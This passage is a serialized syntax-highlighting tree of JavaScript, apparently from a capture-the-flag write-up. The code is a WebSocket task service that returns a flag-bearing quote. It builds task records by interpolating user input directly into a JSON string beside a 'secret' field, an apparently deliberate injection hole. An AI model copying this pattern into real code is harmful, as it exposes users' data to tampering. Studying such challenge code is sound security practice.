ws",{"type":33,"tag":128,"props":49195,"children":49196},{"style":312},[49197],{"type":38,"value":215},{"type":33,"tag":128,"props":49199,"children":49200},{"style":135},[49201],{"type":38,"value":49202},"on",{"type":33,"tag":128,"props":49204,"children":49205},{"style":312},[49206],{"type":38,"value":5566},{"type":33,"tag":128,"props":49208,"children":49209},{"style":676},[49210],{"type":38,"value":6040},{"type":33,"tag":128,"props":49212,"children":49213},{"style":140},[49214],{"type":38,"value":6948},{"type":33,"tag":128,"props":49216,"children":49217},{"style":676},[49218],{"type":38,"value":6040},{"type":33,"tag":128,"props":49220,"children":49221},{"style":312},[49222],{"type":38,"value":5584},{"type":33,"tag":128,"props":49224,"children":49225},{"style":300},[49226],{"type":38,"value":5598},{"type":33,"tag":128,"props":49228,"children":49229},{"style":312},[49230],{"type":38,"value":2852},{"type":33,"tag":128,"props":49232,"children":49233},{"style":306},[49234],{"type":38,"value":49235},"msg",{"type":33,"tag":128,"props":49237,"children":49238},{"style":312},[49239],{"type":38,"value":2966},{"type":33,"tag":128,"props":49241,"children":49242},{"style":312},[49243],{"type":38,"value":5625},{"type":33,"tag":128,"props":49245,"children":49246},{"style":312},[49247],{"type":38,"value":762},{"type":33,"tag":128,"props":49249,"children":49250},{"class":130,"line":1152},[49251,49255,49259,49263,49267,49271,49275,49279,49283],{"type":33,"tag":128,"props":49252,"children":49253},{"style":300},[49254],{"type":38,"value":15121},{"type":33,"tag":128,"props":49256,"children":49257},{"style":306},[49258],{"type":38,"value":13545},{"type":33,"tag":128,"props":49260,"children":49261},{"style":312},[49262],{"type":38,"value":5657},{"type":33,"tag":128,"props":49264,"children":49265},{"style":306},[49266],{"type":38,"value":4321},{"type":33,"tag":128,"props":49268,"children":49269},{"style":312},[49270],{"type":38,"value":215},{"type":33,"tag":128,"props":49272,"children":49273},{"style":135},[49274],{"type":38,"value":25933},{"type":33,"tag":128,"props":49276,"children":49277},{"style":312},[49278],{"type":38,"value":5566},{"type":33,"tag":128,"props":49280,"children":49281},{"style":306},[49282],{"type":38,"value":49235},{"type":33,"tag":128,"props":49284,"children":49285},{"style":312},[49286],{"type":38,"value":5815},{"type":33,"tag":128,"props":49288,"children":49289},{"class":130,"line":1165},[49290,49294,49298,49302,49306,49310,49314,49318,49322,49326,49330,49334,49338,49342],{"type":33,"tag":128,"props":49291,"children":49292},{"style":300},[49293],{"type":38,"value":15121},{"type":33,"tag":128,"props":49295,"children":49296},{"style":306},[49297],{"type":38,"value":5066},{"type":33,"tag":128,"props":49299,"children":49300},{"style":312},[49301],{"type":38,"value":5657},{"type":33,"tag":128,"props":49303,"children":49304},{"style":1576},[49305],{"type":38,"value":5796},{"type":33,"tag":128,"props":49307,"children":49308},{"style":306},[49309],{"type":38,"value":46507},{"type":33,"tag":128,"props":49311,"children":49312},{"style":312},[49313],{"type":38,"value":215},{"type":33,"tag":128,"props":49315,"children":49316},{"style":135},[49317],{"type":38,"value":46516},{"type":33,"tag":128,"props":49319,"children":49320},{"style":312},[49321],{"type":38,"value":5566},{"type":33,"tag":128,"props":49323,"children":49324},{"style":306},[49325],{"type":38,"value":5607},{"type":33,"tag":128,"props":49327,"children":49328},{"style":312},[49329],{"type":38,"value":215},{"type":33,"tag":128,"props":49331,"children":49332},{"style":306},[49333],{"type":38,"value":6557},{"type":33,"tag":128,"props":49335,"children":49336},{"style":312},[49337],{"type":38,"value":215},{"type":33,"tag":128,"props":49339,"children":49340},{"style":306},[49341],{"type":38,"value":6566},{"type":33,"tag":128,"props":49343,"children":49344},{"style":312},[49345],{"type":38,"value":5815},{"type":33,"tag":128,"props":49347,"children":49348},{"class":130,"line":1177},[49349],{"type":33,"tag":128,"props":49350,"children":49351},{"emptyLinePlaceholder":896},[49352],{"type":38,"value":899},{"type":33,"tag":128,"props":49354,"children":49355},{"class":130,"line":1189},[49356,49360,49364,49368,49372,49376,49380,49384,49389,49393,49397],{"type":33,"tag":128,"props":49357,"children":49358},{"style":1576},[49359],{"type":38,"value":15223},{"type":33,"tag":128,"props":49361,"children":49362},{"style":312},[49363],{"type":38,"value":2852},{"type":33,"tag":128,"props":49365,"children":49366},{"style":306},[49367],{"type":38,"value":2815},{"type":33,"tag":128,"props":49369,"children":49370},{"style":312},[49371],{"type":38,"value":215},{"type":33,"tag":128,"props":49373,"children":49374},{"style":306},[49375],{"type":38,"value":12513},{"type":33,"tag":128,"props":49377,"children":49378},{"style":300},[49379],{"type":38,"value":13595},{"type":33,"tag":128,"props":49381,"children":49382},{"style":676},[49383],{"type":38,"value":6739},{"type":33,"tag":128,"props":49385,"children":49386},{"style":140},[49387],{"type":38,"value":49388},"add",{"type":33,"tag":128,"props":49390,"children":49391},{"style":676},[49392],{"type":38,"value":6040},{"type":33,"tag":128,"props":49394,"children":49395},{"style":312},[49396],{"type":38,"value":2966},{"type":33,"tag":128,"props":49398,"children":49399},{"style":312},[49400],{"type":38,"value":762},{"type":33,"tag":128,"props":49402,"children":49403},{"class":130,"line":1202},[49404,49409],{"type":33,"tag":128,"props":49405,"children":49406},{"style":1576},[49407],{"type":38,"value":49408}," try",{"type":33,"tag":128,"props":49410,"children":49411},{"style":312},[49412],{"type":38,"value":762},{"type":33,"tag":128,"props":49414,"children":49415},{"class":130,"line":1214},[49416,49420,49424,49428,49433,49437,49441,49445,49449,49454,49458,49462,49466,49470,49474,49479,49483,49487,49491,49495,49499,49504,49508,49512,49516,49521,49525],{"type":33,"tag":128,"props":49417,"children":49418},{"style":1576},[49419],{"type":38,"value":19763},{"type":33,"tag":128,"props":49421,"children":49422},{"style":306},[49423],{"type":38,"value":46507},{"type":33,"tag":128,"props":49425,"children":49426},{"style":312},[49427],{"type":38,"value":215},{"type":33,"tag":128,"props":49429,"children":49430},{"style":135},[49431],{"type":38,"value":49432},"addTask",{"type":33,"tag":128,"props":49434,"children":49435},{"style":312},[49436],{"type":38,"value":5566},{"type":33,"tag":128,"props":49438,"children":49439},{"style":306},[49440],{"type":38,"value":6566},{"type":33,"tag":128,"props":49442,"children":49443},{"style":312},[49444],{"type":38,"value":5584},{"type":33,"tag":128,"props":49446,"children":49447},{"style":676},[49448],{"type":38,"value":5710},{"type":33,"tag":128,"props":49450,"children":49451},{"style":140},[49452],{"type":38,"value":49453},"{\"title\":\"",{"type":33,"tag":128,"props":49455,"children":49456},{"style":1576},[49457],{"type":38,"value":5720},{"type":33,"tag":128,"props":49459,"children":49460},{"style":140},[49461],{"type":38,"value":2815},{"type":33,"tag":128,"props":49463,"children":49464},{"style":312},[49465],{"type":38,"value":215},{"type":33,"tag":128,"props":49467,"children":49468},{"style":140},[49469],{"type":38,"value":776},{"type":33,"tag":128,"props":49471,"children":49472},{"style":1576},[49473],{"type":38,"value":5730},{"type":33,"tag":128,"props":49475,"children":49476},{"style":140},[49477],{"type":38,"value":49478},"\",\"description\":\"",{"type":33,"tag":128,"props":49480,"children":49481},{"style":1576},[49482],{"type":38,"value":5720},{"type":33,"tag":128,"props":49484,"children":49485},{"style":140},[49486],{"type":38,"value":2815},{"type":33,"tag":128,"props":49488,"children":49489},{"style":312},[49490],{"type":38,"value":215},{"type":33,"tag":128,"props":49492,"children":49493},{"style":140},[49494],{"type":38,"value":12236},{"type":33,"tag":128,"props":49496,"children":49497},{"style":1576},[49498],{"type":38,"value":5730},{"type":33,"tag":128,"props":49500,"children":49501},{"style":140},[49502],{"type":38,"value":49503},"\",\"secret\":\"",{"type":33,"tag":128,"props":49505,"children":49506},{"style":1576},[49507],{"type":38,"value":5720},{"type":33,"tag":128,"props":49509,"children":49510},{"style":140},[49511],{"type":38,"value":46812},{"type":33,"tag":128,"props":49513,"children":49514},{"style":1576},[49515],{"type":38,"value":5730},{"type":33,"tag":128,"props":49517,"children":49518},{"style":140},[49519],{"type":38,"value":49520},"\"}",{"type":33,"tag":128,"props":49522,"children":49523},{"style":676},[49524],{"type":38,"value":5739},{"type":33,"tag":128,"props":49526,"children":49527},{"style":312},[49528],{"type":38,"value":5815},{"type":33,"tag":128,"props":49530,"children":49531},{"class":130,"line":1226},[49532,49537,49541,49545,49549,49553,49557,49562,49566,49570,49574,49578,49582,49586,49590,49594,49598,49602],{"type":33,"tag":128,"props":49533,"children":49534},{"style":306},[49535],{"type":38,"value":49536}," ws",{"type":33,"tag":128,"props":49538,"children":49539},{"style":312},[49540],{"type":38,"value":215},{"type":33,"tag":128,"props":49542,"children":49543},{"style":135},[49544],{"type":38,"value":23433},{"type":33,"tag":128,"props":49546,"children":49547},{"style":312},[49548],{"type":38,"value":5566},{"type":33,"tag":128,"props":49550,"children":49551},{"style":306},[49552],{"type":38,"value":6301},{"type":33,"tag":128,"props":49554,"children":49555},{"style":312},[49556],{"type":38,"value":215},{"type":33,"tag":128,"props":49558,"children":49559},{"style":135},[49560],{"type":38,"value":49561},"stringify",{"type":33,"tag":128,"props":49563,"children":49564},{"style":312},[49565],{"type":38,"value":5836},{"type":33,"tag":128,"props":49567,"children":49568},{"style":437},[49569],{"type":38,"value":5841},{"type":33,"tag":128,"props":49571,"children":49572},{"style":312},[49573],{"type":38,"value":284},{"type":33,"tag":128,"props":49575,"children":49576},{"style":1576},[49577],{"type":38,"value":5850},{"type":33,"tag":128,"props":49579,"children":49580},{"style":312},[49581],{"type":38,"value":5584},{"type":33,"tag":128,"props":49583,"children":49584},{"style":437},[49585],{"type":38,"value":14849},{"type":33,"tag":128,"props":49587,"children":49588},{"style":312},[49589],{"type":38,"value":284},{"type":33,"tag":128,"props":49591,"children":49592},{"style":676},[49593],{"type":38,"value":6739},{"type":33,"tag":128,"props":49595,"children":49596},{"style":140},[49597],{"type":38,"value":49388},{"type":33,"tag":128,"props":49599,"children":49600},{"style":676},[49601],{"type":38,"value":6040},{"type":33,"tag":128,"props":49603,"children":49604},{"style":312},[49605],{"type":38,"value":14256},{"type":33,"tag":128,"props":49607,"children":49608},{"class":130,"line":1239},[49609,49614,49618,49622,49626,49630],{"type":33,"tag":128,"props":49610,"children":49611},{"style":312},[49612],{"type":38,"value":49613}," }",{"type":33,"tag":128,"props":49615,"children":49616},{"style":1576},[49617],{"type":38,"value":6855},{"type":33,"tag":128,"props":49619,"children":49620},{"style":312},[49621],{"type":38,"value":2852},{"type":33,"tag":128,"props":49623,"children":49624},{"style":306},[49625],{"type":38,"value":23474},{"type":33,"tag":128,"props":49627,"children":49628},{"style":312},[49629],{"type":38,"value":2966},{"type":33,"tag":128,"props":49631,"children":49632},{"style":312},[49633],{"type":38,"value":762},{"type":33,"tag":128,"props":49635,"children":49636},{"class":130,"line":1251},[49637,49641,49645,49649,49653,49657,49661,49665,49669,49673,49677,49681,49685,49689,49693,49697,49701,49705],{"type":33,"tag":128,"props":49638,"children":49639},{"style":306},[49640],{"type":38,"value":49536},{"type":33,"tag":128,"props":49642,"children":49643},{"style":312},[49644],{"type":38,"value":215},{"type":33,"tag":128,"props":49646,"children":49647},{"style":135},[49648],{"type":38,"value":23433},{"type":33,"tag":128,"props":49650,"children":49651},{"style":312},[49652],{"type":38,"value":5566},{"type":33,"tag":128,"props":49654,"children":49655},{"style":306},[49656],{"type":38,"value":6301},{"type":33,"tag":128,"props":49658,"children":49659},{"style":312},[49660],{"type":38,"value":215},{"type":33,"tag":128,"props":49662,"children":49663},{"style":135},[49664],{"type":38,"value":49561},{"type":33,"tag":128,"props":49666,"children":49667},{"style":312},[49668],{"type":38,"value":5836},{"type":33,"tag":128,"props":49670,"children":49671},{"style":437},[49672],{"type":38,"value":5841},{"type":33,"tag":128,"props":49674,"children":49675},{"style":312},[49676],{"type":38,"value":284},{"type":33,"tag":128,"props":49678,"children":49679},{"style":1576},[49680],{"type":38,"value":6721},{"type":33,"tag":128,"props":49682,"children":49683},{"style":312},[49684],{"type":38,"value":5584},{"type":33,"tag":128,"props":49686,"children":49687},{"style":437},[49688],{"type":38,"value":14849},{"type":33,"tag":128,"props":49690,"children":49691},{"style":312},[49692],{"type":38,"value":284},{"type":33,"tag":128,"props":49694,"children":49695},{"style":676},[49696],{"type":38,"value":6739},{"type":33,"tag":128,"props":49698,"children":49699},{"style":140},[49700],{"type":38,"value":49388},{"type":33,"tag":128,"props":49702,"children":49703},{"style":676},[49704],{"type":38,"value":6040},{"type":33,"tag":128,"props":49706,"children":49707},{"style":312},[49708],{"type":38,"value":14256},{"type":33,"tag":128,"props":49710,"children":49711},{"class":130,"line":1263},[49712],{"type":33,"tag":128,"props":49713,"children":49714},{"style":312},[49715],{"type":38,"value":35996},{"type":33,"tag":128,"props":49717,"children":49718},{"class":130,"line":1276},[49719],{"type":33,"tag":128,"props":49720,"children":49721},{"style":312},[49722],{"type":38,"value":15318},{"type":33,"tag":128,"props":49724,"children":49725},{"class":130,"line":1288},[49726,49731,49735,49739,49743,49747,49751,49755,49759,49763,49767,49771],{"type":33,"tag":128,"props":49727,"children":49728},{"style":1576},[49729],{"type":38,"value":49730}," else",{"type":33,"tag":128,"props":49732,"children":49733},{"style":1576},[49734],{"type":38,"value":14274},{"type":33,"tag":128,"props":49736,"children":49737},{"style":312},[49738],{"type":38,"value":2852},{"type":33,"tag":128,"props":49740,"children":49741},{"style":306},[49742],{"type":38,"value":2815},{"type":33,"tag":128,"props":49744,"children":49745},{"style":312},[49746],{"type":38,"value":215},{"type":33,"tag":128,"props":49748,"children":49749},{"style":306},[49750],{"type":38,"value":12513},{"type":33,"tag":128,"props":49752,"children":49753},{"style":300},[49754],{"type":38,"value":13595},{"type":33,"tag":128,"props":49756,"children":49757},{"style":676},[49758],{"type":38,"value":6739},{"type":33,"tag":128,"props":49760,"children":49761},{"style":140},[49762],{"type":38,"value":13526},{"type":33,"tag":128,"props":49764,"children":49765},{"style":676},[49766],{"type":38,"value":6040},{"type":33,"tag":128,"props":49768,"children":49769},{"style":312},[49770],{"type":38,"value":2966},{"type":33,"tag":128,"props":49772,"children":49773},{"style":312},[49774],{"type":38,"value":762},{"type":33,"tag":128,"props":49776,"children":49777},{"class":130,"line":1300},[49778,49782],{"type":33,"tag":128,"props":49779,"children":49780},{"style":1576},[49781],{"type":38,"value":49408},{"type":33,"tag":128,"props":49783,"children":49784},{"style":312},[49785],{"type":38,"value":762},{"type":33,"tag":128,"props":49787,"children":49788},{"class":130,"line":1313},[49789,49794,49798,49802,49806,49810,49814,49819,49823,49827],{"type":33,"tag":128,"props":49790,"children":49791},{"style":300},[49792],{"type":38,"value":49793}," const",{"type":33,"tag":128,"props":49795,"children":49796},{"style":306},[49797],{"type":38,"value":5787},{"type":33,"tag":128,"props":49799,"children":49800},{"style":312},[49801],{"type":38,"value":5657},{"type":33,"tag":128,"props":49803,"children":49804},{"style":1576},[49805],{"type":38,"value":5796},{"type":33,"tag":128,"props":49807,"children":49808},{"style":306},[49809],{"type":38,"value":46507},{"type":33,"tag":128,"props":49811,"children":49812},{"style":312},[49813],{"type":38,"value":215},{"type":33,"tag":128,"props":49815,"children":49816},{"style":135},[49817],{"type":38,"value":49818},"getTasks",{"type":33,"tag":128,"props":49820,"children":49821},{"style":312},[49822],{"type":38,"value":5566},{"type":33,"tag":128,"props":49824,"children":49825},{"style":306},[49826],{"type":38,"value":6566},{"type":33,"tag":128,"props":49828,"children":49829},{"style":312},[49830],{"type":38,"value":5815},{"type":33,"tag":128,"props":49832,"children":49833},{"class":130,"line":1327},[49834,49838,49843,49847],{"type":33,"tag":128,"props":49835,"children":49836},{"style":300},[49837],{"type":38,"value":49793},{"type":33,"tag":128,"props":49839,"children":49840},{"style":306},[49841],{"type":38,"value":49842}," tasks",{"type":33,"tag":128,"props":49844,"children":49845},{"style":312},[49846],{"type":38,"value":5657},{"type":33,"tag":128,"props":49848,"children":49849},{"style":312},[49850],{"type":38,"value":49851}," [];\n",{"type":33,"tag":128,"props":49853,"children":49854},{"class":130,"line":11196},[49855,49860,49864,49868,49872,49876,49880,49884],{"type":33,"tag":128,"props":49856,"children":49857},{"style":1576},[49858],{"type":38,"value":49859}," for",{"type":33,"tag":128,"props":49861,"children":49862},{"style":312},[49863],{"type":38,"value":2852},{"type":33,"tag":128,"props":49865,"children":49866},{"style":300},[49867],{"type":38,"value":15973},{"type":33,"tag":128,"props":49869,"children":49870},{"style":306},[49871],{"type":38,"value":35848},{"type":33,"tag":128,"props":49873,"children":49874},{"style":300},[49875],{"type":38,"value":15983},{"type":33,"tag":128,"props":49877,"children":49878},{"style":306},[49879],{"type":38,"value":5787},{"type":33,"tag":128,"props":49881,"children":49882},{"style":312},[49883],{"type":38,"value":2966},{"type":33,"tag":128,"props":49885,"children":49886},{"style":312},[49887],{"type":38,"value":762},{"type":33,"tag":128,"props":49889,"children":49890},{"class":130,"line":11204},[49891],{"type":33,"tag":128,"props":49892,"children":49893},{"emptyLinePlaceholder":896},[49894],{"type":38,"value":899},{"type":33,"tag":128,"props":49896,"children":49897},{"class":130,"line":11213},[49898,49903,49908],{"type":33,"tag":128,"props":49899,"children":49900},{"style":300},[49901],{"type":38,"value":49902}," let",{"type":33,"tag":128,"props":49904,"children":49905},{"style":306},[49906],{"type":38,"value":49907}," quote",{"type":33,"tag":128,"props":49909,"children":49910},{"style":312},[49911],{"type":38,"value":5676},{"type":33,"tag":128,"props":49913,"children":49914},{"class":130,"line":11250},[49915],{"type":33,"tag":128,"props":49916,"children":49917},{"emptyLinePlaceholder":896},[49918],{"type":38,"value":899},{"type":33,"tag":128,"props":49920,"children":49921},{"class":130,"line":11270},[49922,49927,49931,49935,49939,49943,49947],{"type":33,"tag":128,"props":49923,"children":49924},{"style":1576},[49925],{"type":38,"value":49926}," if",{"type":33,"tag":128,"props":49928,"children":49929},{"style":312},[49930],{"type":38,"value":2852},{"type":33,"tag":128,"props":49932,"children":49933},{"style":306},[49934],{"type":38,"value":6566},{"type":33,"tag":128,"props":49936,"children":49937},{"style":300},[49938],{"type":38,"value":13595},{"type":33,"tag":128,"props":49940,"children":49941},{"style":523},[49942],{"type":38,"value":9774},{"type":33,"tag":128,"props":49944,"children":49945},{"style":312},[49946],{"type":38,"value":2966},{"type":33,"tag":128,"props":49948,"children":49949},{"style":312},[49950],{"type":38,"value":762},{"type":33,"tag":128,"props":49952,"children":49953},{"class":130,"line":11278},[49954,49959,49963,49967,49972,49976,49981,49985,49989,49993,49998,50002,50007,50011],{"type":33,"tag":128,"props":49955,"children":49956},{"style":306},[49957],{"type":38,"value":49958}," quote",{"type":33,"tag":128,"props":49960,"children":49961},{"style":312},[49962],{"type":38,"value":5657},{"type":33,"tag":128,"props":49964,"children":49965},{"style":676},[49966],{"type":38,"value":5710},{"type":33,"tag":128,"props":49968,"children":49969},{"style":140},[49970],{"type":38,"value":49971},"A wise man once said, \"the flag is ",{"type":33,"tag":128,"props":49973,"children":49974},{"style":1576},[49975],{"type":38,"value":5720},{"type":33,"tag":128,"props":49977,"children":49978},{"style":140},[49979],{"type":38,"value":49980},"process",{"type":33,"tag":128,"props":49982,"children":49983},{"style":312},[49984],{"type":38,"value":215},{"type":33,"tag":128,"props":49986,"children":49987},{"style":140},[49988],{"type":38,"value":44351},{"type":33,"tag":128,"props":49990,"children":49991},{"style":312},[49992],{"type":38,"value":215},{"type":33,"tag":128,"props":49994,"children":49995},{"style":140},[49996],{"type":38,"value":49997},"FLAG",{"type":33,"tag":128,"props":49999,"children":50000},{"style":1576},[50001],{"type":38,"value":5730},{"type":33,"tag":128,"props":50003,"children":50004},{"style":140},[50005],{"type":38,"value":50006},"\".",{"type":33,"tag":128,"props":50008,"children":50009},{"style":676},[50010],{"type":38,"value":5739},{"type":33,"tag":128,"props":50012,"children":50013},{"style":312},[50014],{"type":38,"value":5676},{"type":33,"tag":128,"props":50016,"children":50017},{"class":130,"line":11334},[50018,50023,50027],{"type":33,"tag":128,"props":50019,"children":50020},{"style":312},[50021],{"type":38,"value":50022}," }",{"type":33,"tag":128,"props":50024,"children":50025},{"style":1576},[50026],{"type":38,"value":14269},{"type":33,"tag":128,"props":50028,"children":50029},{"style":312},[50030],{"type":38,"value":762},{"type":33,"tag":128,"props":50032,"children":50033},{"class":130,"line":11375},[50034,50038,50042,50046,50050,50055,50059,50064,50068,50072,50076,50081,50085,50089,50093,50097,50101],{"type":33,"tag":128,"props":50035,"children":50036},{"style":306},[50037],{"type":38,"value":49958},{"type":33,"tag":128,"props":50039,"children":50040},{"style":312},[50041],{"type":38,"value":5657},{"type":33,"tag":128,"props":50043,"children":50044},{"style":306},[50045],{"type":38,"value":48876},{"type":33,"tag":128,"props":50047,"children":50048},{"style":312},[50049],{"type":38,"value":344},{"type":33,"tag":128,"props":50051,"children":50052},{"style":306},[50053],{"type":38,"value":50054},"Math",{"type":33,"tag":128,"props":50056,"children":50057},{"style":312},[50058],{"type":38,"value":215},{"type":33,"tag":128,"props":50060,"children":50061},{"style":135},[50062],{"type":38,"value":50063},"floor",{"type":33,"tag":128,"props":50065,"children":50066},{"style":312},[50067],{"type":38,"value":5566},{"type":33,"tag":128,"props":50069,"children":50070},{"style":306},[50071],{"type":38,"value":50054},{"type":33,"tag":128,"props":50073,"children":50074},{"style":312},[50075],{"type":38,"value":215},{"type":33,"tag":128,"props":50077,"children":50078},{"style":135},[50079],{"type":38,"value":50080},"random",{"type":33,"tag":128,"props":50082,"children":50083},{"style":312},[50084],{"type":38,"value":9376},{"type":33,"tag":128,"props":50086,"children":50087},{"style":300},[50088],{"type":38,"value":9826},{"type":33,"tag":128,"props":50090,"children":50091},{"style":306},[50092],{"type":38,"value":48876},{"type":33,"tag":128,"props":50094,"children":50095},{"style":312},[50096],{"type":38,"value":215},{"type":33,"tag":128,"props":50098,"children":50099},{"style":437},[50100],{"type":38,"value":6643},{"type":33,"tag":128,"props":50102,"children":50103},{"style":312},[50104],{"type":38,"value":50105},")];\n",{"type":33,"tag":128,"props":50107,"children":50108},{"class":130,"line":11383},[50109],{"type":33,"tag":128,"props":50110,"children":50111},{"style":312},[50112],{"type":38,"value":50113}," }\n",{"type":33,"tag":128,"props":50115,"children":50116},{"class":130,"line":11392},[50117],{"type":33,"tag":128,"props":50118,"children":50119},{"emptyLinePlaceholder":896},[50120],{"type":38,"value":899},{"type":33,"tag":128,"props":50122,"children":50123},{"class":130,"line":11417},[50124,50129],{"type":33,"tag":128,"props":50125,"children":50126},{"style":1576},[50127],{"type":38,"value":50128}," try",{"type":33,"tag":128,"props":50130,"children":50131},{"style":312},[50132],{"type":38,"value":762},{"type":33,"tag":128,"props":50134,"children":50135},{"class":130,"line":11441},[50136,50141,50146,50150,50154,50158,50162,50166,50170,50174,50178],{"type":33,"tag":128,"props":50137,"children":50138},{"style":300},[50139],{"type":38,"value":50140}," const",{"type":33,"tag":128,"props":50142,"children":50143},{"style":306},[50144],{"type":38,"value":50145}," task",{"type":33,"tag":128,"props":50147,"children":50148},{"style":312},[50149],{"type":38,"value":5657},{"type":33,"tag":128,"props":50151,"children":50152},{"style":306},[50153],{"type":38,"value":4321},{"type":33,"tag":128,"props":50155,"children":50156},{"style":312},[50157],{"type":38,"value":215},{"type":33,"tag":128,"props":50159,"children":50160},{"style":135},[50161],{"type":38,"value":25933},{"type":33,"tag":128,"props":50163,"children":50164},{"style":312},[50165],{"type":38,"value":5566},{"type":33,"tag":128,"props":50167,"children":50168},{"style":306},[50169],{"type":38,"value":35934},{"type":33,"tag":128,"props":50171,"children":50172},{"style":312},[50173],{"type":38,"value":215},{"type":33,"tag":128,"props":50175,"children":50176},{"style":306},[50177],{"type":38,"value":2815},{"type":33,"tag":128,"props":50179,"children":50180},{"style":312},[50181],{"type":38,"value":5815},{"type":33,"tag":128,"props":50183,"children":50184},{"class":130,"line":48574},[50185,50190,50194,50199],{"type":33,"tag":128,"props":50186,"children":50187},{"style":306},[50188],{"type":38,"value":50189}," tasks",{"type":33,"tag":128,"props":50191,"children":50192},{"style":312},[50193],{"type":38,"value":215},{"type":33,"tag":128,"props":50195,"children":50196},{"style":135},[50197],{"type":38,"value":50198},"push",{"type":33,"tag":128,"props":50200,"children":50201},{"style":312},[50202],{"type":38,"value":48206},{"type":33,"tag":128,"props":50204,"children":50205},{"class":130,"line":48602},[50206,50211,50215,50219,50223,50228,50232,50236,50240,50244,50248,50252],{"type":33,"tag":128,"props":50207,"children":50208},{"style":437},[50209],{"type":38,"value":50210}," title",{"type":33,"tag":128,"props":50212,"children":50213},{"style":312},[50214],{"type":38,"value":284},{"type":33,"tag":128,"props":50216,"children":50217},{"style":135},[50218],{"type":38,"value":48778},{"type":33,"tag":128,"props":50220,"children":50221},{"style":312},[50222],{"type":38,"value":5566},{"type":33,"tag":128,"props":50224,"children":50225},{"style":306},[50226],{"type":38,"value":50227},"task",{"type":33,"tag":128,"props":50229,"children":50230},{"style":312},[50231],{"type":38,"value":215},{"type":33,"tag":128,"props":50233,"children":50234},{"style":306},[50235],{"type":38,"value":776},{"type":33,"tag":128,"props":50237,"children":50238},{"style":312},[50239],{"type":38,"value":5584},{"type":33,"tag":128,"props":50241,"children":50242},{"style":306},[50243],{"type":38,"value":50145},{"type":33,"tag":128,"props":50245,"children":50246},{"style":312},[50247],{"type":38,"value":215},{"type":33,"tag":128,"props":50249,"children":50250},{"style":306},[50251],{"type":38,"value":46812},{"type":33,"tag":128,"props":50253,"children":50254},{"style":312},[50255],{"type":38,"value":50256},"),\n",{"type":33,"tag":128,"props":50258,"children":50259},{"class":130,"line":48667},[50260,50265,50269,50273,50277,50281,50285,50289,50293,50297,50301,50305],{"type":33,"tag":128,"props":50261,"children":50262},{"style":437},[50263],{"type":38,"value":50264}," description",{"type":33,"tag":128,"props":50266,"children":50267},{"style":312},[50268],{"type":38,"value":284},{"type":33,"tag":128,"props":50270,"children":50271},{"style":135},[50272],{"type":38,"value":48778},{"type":33,"tag":128,"props":50274,"children":50275},{"style":312},[50276],{"type":38,"value":5566},{"type":33,"tag":128,"props":50278,"children":50279},{"style":306},[50280],{"type":38,"value":50227},{"type":33,"tag":128,"props":50282,"children":50283},{"style":312},[50284],{"type":38,"value":215},{"type":33,"tag":128,"props":50286,"children":50287},{"style":306},[50288],{"type":38,"value":12236},{"type":33,"tag":128,"props":50290,"children":50291},{"style":312},[50292],{"type":38,"value":5584},{"type":33,"tag":128,"props":50294,"children":50295},{"style":306},[50296],{"type":38,"value":50145},{"type":33,"tag":128,"props":50298,"children":50299},{"style":312},[50300],{"type":38,"value":215},{"type":33,"tag":128,"props":50302,"children":50303},{"style":306},[50304],{"type":38,"value":46812},{"type":33,"tag":128,"props":50306,"children":50307},{"style":312},[50308],{"type":38,"value":50256},{"type":33,"tag":128,"props":50310,"children":50311},{"class":130,"line":48675},[50312,50317,50321,50325,50329,50334,50338,50342,50346,50350],{"type":33,"tag":128,"props":50313,"children":50314},{"style":437},[50315],{"type":38,"value":50316}," quote",{"type":33,"tag":128,"props":50318,"children":50319},{"style":312},[50320],{"type":38,"value":284},{"type":33,"tag":128,"props":50322,"children":50323},{"style":135},[50324],{"type":38,"value":48778},{"type":33,"tag":128,"props":50326,"children":50327},{"style":312},[50328],{"type":38,"value":5566},{"type":33,"tag":128,"props":50330,"children":50331},{"style":306},[50332],{"type":38,"value":50333},"quote",{"type":33,"tag":128,"props":50335,"children":50336},{"style":312},[50337],{"type":38,"value":5584},{"type":33,"tag":128,"props":50339,"children":50340},{"style":306},[50341],{"type":38,"value":50145},{"type":33,"tag":128,"props":50343,"children":50344},{"style":312},[50345],{"type":38,"value":215},{"type":33,"tag":128,"props":50347,"children":50348},{"style":306},[50349],{"type":38,"value":46812},{"type":33,"tag":128,"props":50351,"children":50352},{"style":312},[50353],{"type":38,"value":2427},{"type":33,"tag":128,"props":50355,"children":50356},{"class":130,"line":48683},[50357],{"type":33,"tag":128,"props":50358,"children":50359},{"style":312},[50360],{"type":38,"value":50361}," });\n",{"type":33,"tag":128,"props":50363,"children":50364},{"class":130,"line":48691},[50365,50369,50373,50377,50381,50385],{"type":33,"tag":128,"props":50366,"children":50367},{"style":312},[50368],{"type":38,"value":50022},{"type":33,"tag":128,"props":50370,"children":50371},{"style":1576},[50372],{"type":38,"value":6855},{"type":33,"tag":128,"props":50374,"children":50375},{"style":312},[50376],{"type":38,"value":2852},{"type":33,"tag":128,"props":50378,"children":50379},{"style":306},[50380],{"type":38,"value":23474},{"type":33,"tag":128,"props":50382,"children":50383},{"style":312},[50384],{"type":38,"value":2966},{"type":33,"tag":128,"props":50386,"children":50387},{"style":312},[50388],{"type":38,"value":762},{"type":33,"tag":128,"props":50390,"children":50392},{"class":130,"line":50391},56,[50393,50398,50402,50406,50410,50414,50419,50423,50427,50431,50435,50439,50444,50448,50452,50456,50460],{"type":33,"tag":128,"props":50394,"children":50395},{"style":306},[50396],{"type":38,"value":50397}," console",{"type":33,"tag":128,"props":50399,"children":50400},{"style":312},[50401],{"type":38,"value":215},{"type":33,"tag":128,"props":50403,"children":50404},{"style":135},[50405],{"type":38,"value":13157},{"type":33,"tag":128,"props":50407,"children":50408},{"style":312},[50409],{"type":38,"value":5566},{"type":33,"tag":128,"props":50411,"children":50412},{"style":676},[50413],{"type":38,"value":5739},{"type":33,"tag":128,"props":50415,"children":50416},{"style":140},[50417],{"type":38,"value":50418},"Error parsing task ",{"type":33,"tag":128,"props":50420,"children":50421},{"style":1576},[50422],{"type":38,"value":5720},{"type":33,"tag":128,"props":50424,"children":50425},{"style":140},[50426],{"type":38,"value":35934},{"type":33,"tag":128,"props":50428,"children":50429},{"style":312},[50430],{"type":38,"value":215},{"type":33,"tag":128,"props":50432,"children":50433},{"style":140},[50434],{"type":38,"value":2815},{"type":33,"tag":128,"props":50436,"children":50437},{"style":1576},[50438],{"type":38,"value":5730},{"type":33,"tag":128,"props":50440,"children":50441},{"style":140},[50442],{"type":38,"value":50443},": 